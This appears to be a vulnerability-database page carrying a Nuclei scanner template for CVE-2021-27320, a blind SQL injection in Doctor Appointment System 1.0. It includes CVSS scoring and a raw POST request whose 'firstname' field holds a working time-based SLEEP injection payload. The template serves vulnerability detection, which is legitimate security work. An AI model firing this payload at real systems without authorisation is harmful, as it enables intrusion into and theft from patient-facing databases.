Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27320
HistoryMay 06, 2023 - 12:12 p.m.

Doctor Appointment System 1.0 - SQL Injection

2023-05-0612:12:20
ProjectDiscovery
github.com
7
cve2021
sqli
doctor-appointment-system
packetstorm
doctor_appointment_system_project
blind-sql-injection
unauthorized-access
data-leakage
data-manipulation
upgrade-vulnerability mitigation

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.15

Percentile

95.9%

Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
id: CVE-2021-27320

info:
  name: Doctor Appointment System 1.0 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
    - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27320
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-27320
    cwe-id: CWE-89
    epss-score: 0.10551
    epss-percentile: 0.95011
    cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: doctor_appointment_system_project
    product: doctor_appointment_system
  tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project

http:
  - raw:
      - |
        @timeout: 10s
        POST /contactus.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 500'
          - 'contains(body, "Medical Management System")'
        condition: and
# digest: 4b0a00483046022100e19069ba819c51cbb906a921026dc33a3ea4777dfdfde261cd3eecc4bdf2f60b022100aaff811bc5771e0fa07652ec9066319676fe5ee3edf3f665b969a24c584788c3:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.15

Percentile

95.9%

Related for NUCLEI:CVE-2021-27320